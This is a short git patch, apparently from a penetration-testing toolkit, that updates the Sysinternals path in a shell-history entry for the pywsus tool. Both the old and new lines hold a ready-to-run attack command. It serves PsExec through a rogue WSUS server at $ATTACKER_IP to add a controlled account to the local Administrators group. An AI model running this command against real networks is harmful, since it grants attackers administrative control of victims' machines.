From 6803c3787e5de0fccb4db78960f9e7d4dda73c3c Mon Sep 17 00:00:00 2001 From: Mathis Cariou Date: Thu, 2 Mar 2023 12:24:54 +0100 Subject: [PATCH] Fix pywsus history command The Sysinternals folder has been has been moved from /opt/resources/windows/sysinternals/ to /opt/resources/windows/SysinternalsSuite/. This commit reflects this change in the history file of the pywsus tool. --- sources/zsh/history.d/pywsus | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/zsh/history.d/pywsus b/sources/zsh/history.d/pywsus index 81ae2c09a..b0c59b4c9 100644 --- a/sources/zsh/history.d/pywsus +++ b/sources/zsh/history.d/pywsus @@ -1 +1 @@ -pywsus.py --host "$ATTACKER_IP" --port 8530 --executable /opt/resources/windows/sysinternals/PsExec64.exe --command '/accepteula /s cmd.exe /c "net localgroup Administrators DOMAIN\controlleduser /add"' +pywsus.py --host "$ATTACKER_IP" --port 8530 --executable /opt/resources/windows/SysinternalsSuite/PsExec64.exe --command '/accepteula /s cmd.exe /c "net localgroup Administrators DOMAIN\controlleduser /add"'